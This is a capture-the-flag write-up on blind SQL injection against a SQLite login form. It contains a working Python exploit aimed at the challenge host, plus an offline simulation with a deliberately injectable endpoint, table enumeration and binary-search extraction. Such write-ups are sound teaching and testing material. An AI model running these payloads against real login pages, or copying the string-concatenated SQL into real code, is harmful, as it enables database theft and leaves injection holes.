An SQLite injection problem. The login form is vulnerable to a boolean-based blind injection: a payload that makes the `WHERE` clause true logs us in as `root`, so the presence of the string `root` in the response is the oracle. The script below first finds the length of the target value with `length()`, then recovers it one character at a time with `substr()`.
import httplib, urllib

# Boolean-based blind SQL injection against /login.
# Oracle: when the injected condition is true the WHERE clause matches the
# first user (root) and the response page contains the string 'root'.
ck = ""        # Cookie header (empty)
referer = ""   # Referer header (empty)

# barking up the wrong tree --
# earlier targets tried while exploring the schema (kept for reference)
#toget = "(SELECT password from users where name='root')"
#toget = "(SELECT name FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET 0)"
#toget = "(SELECT count() from keys)"
#toget = "(SELECT sql FROM sqlite_master WHERE type='table' LIMIT 1 OFFSET 0)"
toget = "(SELECT value FROM keys LIMIT 1 OFFSET 0)"   # the value to extract
stage = 2      # stage 1: find the length, stage 2: extract the characters

print "[*] Stage1: Find Length of " + toget
answer = ""
length = 0
j = 1          # current stage
k = 1          # stage 1: candidate length; stage 2: character position
i = 0x7E       # candidate character, scanned downwards from '~'

conn = httplib.HTTPConnection("babysfirst.shallweplayaga.me", 8041)
conn.connect()

while j <= stage:
    if j == 1:
        query = "' or length(" + toget + ")=" + str(k) + " -- "
    else:
        ch = chr(i)
        if ch == "'":
            ch = "''"  # a bare quote would close the injected string literal
        query = "' or substr(" + toget + "," + str(k) + ",1) = '" + ch + "' -- "
    val = urllib.urlencode({'username': query, 'password': '1'})
    headers = {
        'Accept': 'text/html, application/xhtml+xml, */*',
        'Content-type': 'application/x-www-form-urlencoded',
        'Content-length': str(len(val)),
        'Cookie': ck,
        'Referer': referer,
        'Accept-Language': 'ko-KR',
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 10.6; hello; Trident/6.0)',
    }
    conn.request('POST', '/login', val, headers)
    response = conn.getresponse()
    data = response.read()

    if j == 1:
        print "now: " + str(k)
        if data.find('root') != -1:
            length = k
            print "[+] Length: " + str(length)
            print data
            print "[*] Stage 2"
            k = 1
            j = 2          # go to stage 2
            continue
        if k == 100:
            print "[-] NotFound"
            break
        k = k + 1
    else:
        print "now: " + chr(i)
        if data.find('root') != -1:
            answer = answer + chr(i)
            print "Find: " + answer
            k = k + 1
            i = 0x7E       # restart the scan for the next position
            if k > length:
                break
            else:
                continue
        i = i - 1
        if i < 0x20:       # ran out of printable characters
            print "[-] NotFound"
            break

conn.close()
print data
print "Answer:" + answer
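The same technique, carried through offline as an added example (this is not the challenge's code or the script above). An in-memory SQLite database stands in for the remote service: the table names `users` and `keys` are taken from the script, but the row contents, the `login_page()` function and the constructed `FLAG` are assumptions made here. It reproduces the two stages of the script (length probe, then per-character `substr()` scan), carries the commented-out `sqlite_master` probing through to a table listing, and adds a binary search on `unicode(substr(...))` that needs at most 7 requests per character instead of up to 95.

```python
import sqlite3

# Constructed stand-in for the challenge backend (the real service is not
# available offline). Table names come from the script above; contents are
# made up here.
FLAG = "The flag is: sqlite_blind_example_2013"   # constructed sample secret


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('root', 's3cret');
        CREATE TABLE keys (value TEXT);
    """)
    db.execute("INSERT INTO keys VALUES (?)", (FLAG,))
    return db


DB = build_db()
REQUESTS = {"count": 0}   # number of simulated HTTP requests made so far


def login_page(username, password):
    """Vulnerable endpoint: input is concatenated straight into the SQL text."""
    REQUESTS["count"] += 1
    sql = ("SELECT name FROM users WHERE name='%s' AND password='%s'"
           % (username, password))
    row = DB.execute(sql).fetchone()
    return "Welcome back, %s!" % row[0] if row else "Login failed"


# --- attacker side ---------------------------------------------------------

def oracle(condition):
    """True iff `condition` holds: the OR makes the WHERE clause match root,
    so the greeting contains 'root'; `--` comments out the password check."""
    payload = "' or (%s) -- " % condition
    return "root" in login_page(payload, "x")


def find_length(subquery, limit=100):
    """Stage 1 of the script: probe length(subquery)=k for k = 1..limit.
    Returns None when the subquery yields NULL (length(NULL) never compares equal)."""
    for k in range(1, limit + 1):
        if oracle("length(%s)=%d" % (subquery, k)):
            return k
    return None


def extract_linear(subquery, length):
    """Stage 2 as the script does it: try every printable char from '~' down."""
    out = ""
    for k in range(1, length + 1):
        for code in range(0x7E, 0x1F, -1):
            ch = chr(code)
            lit = "''" if ch == "'" else ch      # a quote would close the literal
            if oracle("substr(%s,%d,1)='%s'" % (subquery, k, lit)):
                out += ch
                break
        else:
            raise ValueError("no printable char at position %d" % k)
    return out


def extract_bsearch(subquery, length, lo=0x20, hi=0x7E):
    """Same oracle, binary search on the code point via SQLite's unicode().
    Assumes every character lies in [lo, hi] (printable ASCII by default)."""
    out = ""
    for k in range(1, length + 1):
        a, b = lo, hi                        # invariant: code point is in [a, b]
        while a < b:
            mid = (a + b) // 2
            if oracle("unicode(substr(%s,%d,1))>%d" % (subquery, k, mid)):
                a = mid + 1
            else:
                b = mid
        out += chr(a)
    return out


def list_tables(max_tables=32):
    """The sqlite_master probe the script left commented out, carried through:
    walk OFFSET n until the scalar subquery returns NULL."""
    tables = []
    for n in range(max_tables):
        sub = ("(SELECT name FROM sqlite_master WHERE type='table' "
               "LIMIT 1 OFFSET %d)" % n)
        length = find_length(sub)
        if length is None:
            break
        tables.append(extract_bsearch(sub, length))
    return tables


if __name__ == "__main__":
    print("tables:", list_tables())
    target = "(SELECT value FROM keys LIMIT 1 OFFSET 0)"
    n = find_length(target)
    before = REQUESTS["count"]
    print("value:", extract_bsearch(target, n))
    print("requests for %d chars (binary search): %d"
          % (n, REQUESTS["count"] - before))
```

The `unicode()` comparison only works because the target is plain ASCII; for values outside `[lo, hi]` the binary search returns a boundary value, so widen the bounds (or fall back to the linear scan) when the extracted text looks wrong.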